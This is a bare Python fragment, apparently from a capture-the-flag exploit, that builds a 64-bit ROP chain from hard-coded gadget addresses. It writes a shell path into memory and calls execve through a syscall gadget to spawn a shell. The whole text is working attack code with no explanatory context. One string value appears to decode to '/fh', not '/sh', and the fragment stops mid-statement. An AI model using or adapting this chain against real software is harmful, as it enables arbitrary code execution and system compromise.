payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x49026d)+p64(0x45ee6d)
# 0x000000000045ee6d: pop rcx; ret; 
payload += p64(0x80)+p64(0x43eb26)
# 0x000000000043eb26: xchg ecx, eax; ret 4; 
payload += p64(0x46ff24)+"\x00"*4
# 0x000000000046ff24: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x490070)+p64(0x45ee6d)
# 0x000000000045ee6d: pop rcx; ret; 
payload += p64(0x6e69622f)+p64(0x43eb26)
# 0x000000000043eb26: xchg ecx, eax; ret 4; 
payload += p64(0x46ff24)+"\x00"*4
# 0x000000000046ff24: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x490074)+p64(0x45ee6d)
# 0x000000000045ee6d: pop rcx; ret; 
payload += p64(0x68662f)+p64(0x43eb26)
# 0x000000000043eb26: xchg ecx, eax; ret 4; 
payload += p64(0x46ff24)+"\x00"*4
# 0x000000000046ff24: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x490070)+p64(0x45ee6d)
# 0x000000000045ee6d: pop rcx; ret; 
payload += p64(0x36b90082)+p64(0x43eb26)
# 0x000000000043eb26: xchg ecx, eax; ret 4; 
payload += p64(0x401553)+"\x00"*4
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x45ee6d)
# 0x000000000045ee6d: pop rcx; ret; 
payload += p64(0x3b)+p64(0x43eb26)
# 0x000000000043eb26: xchg ecx, eax; ret 4; 
payload += p64(0x44257b)+"\x00"*4
# 0x000000000044257b: syscall; ret; 
payload +=
